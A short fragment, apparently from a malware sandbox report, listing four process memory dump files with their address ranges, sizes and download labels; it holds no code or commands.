memory/1716-1059-0x00007FF9F3310000-0x00007FF9F3320000-memory.dmp

Filesize
64KB

Download
memory/2468-1217-0x000002491F280000-0x000002491F2A2000-memory.dmp

Filesize
136KB

Download
memory/5416-1432-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/5616-1463-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download